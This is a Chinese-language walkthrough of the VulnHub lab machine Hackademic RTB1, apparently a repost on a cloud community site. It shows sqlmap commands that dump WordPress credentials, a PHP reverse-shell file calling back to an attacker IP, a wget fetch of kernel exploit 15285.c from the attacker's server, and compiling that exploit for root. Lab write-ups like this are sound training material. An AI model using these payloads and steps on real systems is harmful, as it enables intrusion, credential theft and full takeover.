HACKADEMIC: RTB1靶场-复现笔记
  omsGpKEBqqZu 2023年11月13日 31 0

靶机介绍

官方下载地址:https://www.vulnhub.com/entry/hackademic-rtb1,17/

靶机目标

获取root目录里key.txt

运行环境:
虚拟机网络设置的是NAT模式

获取靶机IP地址

HACKADEMIC: RTB1靶场-复现笔记_vulnhub

查看靶机开放端口号

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_02

进入靶机


HACKADEMIC: RTB1靶场-复现笔记_vulnhub_03

扫描敏感目录

nikto -h http://192.168.110.235
dirb http://192.168.110.235/Hackademic_RTB1/
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html -u http://192.168.110.235

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_04

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_05

漏洞利用

web端寻找漏洞,php页面,f12代码注入,sql注入

HACKADEMIC: RTB1靶场-复现笔记_靶机_06

sqlmap跑一下

sqlmap -u http://192.168.110.235/Hackademic_RTB1/?cat=1 --dbs --batch

HACKADEMIC: RTB1靶场-复现笔记_靶机_07

HACKADEMIC: RTB1靶场-复现笔记_靶机_08

sqlmap -u http://192.168.110.235/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress --tables --batch

HACKADEMIC: RTB1靶场-复现笔记_靶机_09

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_10

sqlmap -u http://192.168.110.235/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users --columns --batch

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_11

sqlmap -u http://192.168.110.235/Hackademic_RTB1/?cat=1 --dbms=MySQL -D wordpress -T wp_users -C user_login,user_pass --dump --batch

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_12

GeorgeMiller、q1w2e3登录


HACKADEMIC: RTB1靶场-复现笔记_靶机_13

HACKADEMIC: RTB1靶场-复现笔记_靶机_14

getshell

shell.php

<div>
<?php
$sock = fsockopen('192.168.233.129','8888');
$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);
$peocess = proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
?>
</div>

上传shell

HACKADEMIC: RTB1靶场-复现笔记_靶机_15

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_16

运行反弹shell

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_17


反弹shell成功

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_18

提权

  1. 尝试sudo提权,但无权限
  2. 查看linxu内核版本2.6.31.5,尝试内核提权

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_19

  1. kali搜索可利用代码

searchsploit2.6.3

经测试15285.c可用

HACKADEMIC: RTB1靶场-复现笔记_靶机_20

HACKADEMIC: RTB1靶场-复现笔记_靶机_21

下载到本地searchsploit -m 15285.c

kali开启web服务器

HACKADEMIC: RTB1靶场-复现笔记_vulnhub_22

在靶机中下载

wget http://192.168.110.236/15285.c

HACKADEMIC: RTB1靶场-复现笔记_靶机_23

编译脚本

gcc 15285.c -o exp

将编译的exp赋予执行权限并执行exp

HACKADEMIC: RTB1靶场-复现笔记_靶机_24

成功拿到root

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月13日 0

暂无评论